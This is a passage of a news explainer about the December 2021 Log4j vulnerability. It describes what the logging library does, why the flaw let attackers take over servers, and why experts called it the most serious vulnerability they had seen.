On Dec. 9, word of a newly discovered computer bug in a hugely popular piece of computer code started rippling around the cybersecurity community. By the next day, nearly every major software company was in crisis mode, trying to figure out how their products were affected and how they could patch the hole.
The descriptions used by security experts to describe the new vulnerability in an extremely common section of code called log4j border on the apocalyptic.
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career,” United States Cybersecurity and Infrastructure Security Director Jen Easterly said in a Thursday interview on CNBC.
So why is this obscure piece of software causing so much panic, and should regular computer users be worried?
What is Log4j and where did it come from?
Log4j is a chunk of code that helps software applications keep track of their past activities. Instead of reinventing a “logging” – or record-keeping – component each time developers build new software, they often use existing code like log4j instead. It’s free on the Internet and very widely used, appearing in a “big chunk” of Internet services, according to Asaf Ashkenazi, chief operating officer of security company Verimatrix.
Each time log4j is asked to log something new, it tries to make sense of that new entry and add it to the record. A few weeks ago, the cybersecurity community realized that by simply asking the program to log a line of malicious code, it would execute that code in the process, effectively letting bad actors grab control of servers that are running log4j.
Reports differ when it comes to who first raised the alarm about the vulnerability. Some people say it surfaced in a forum dedicated to the video game Minecraft. Others point to a security researcher at Chinese tech company Alibaba. But experts say it’s the biggest software vulnerability of all time in terms of the number of services, sites and devices exposed.
Software bugs crop up all the time. Why is this one different?
The fact that log4j is such a ubiquitous piece of software is what makes this such a big deal. Imagine if a common type of lock used by…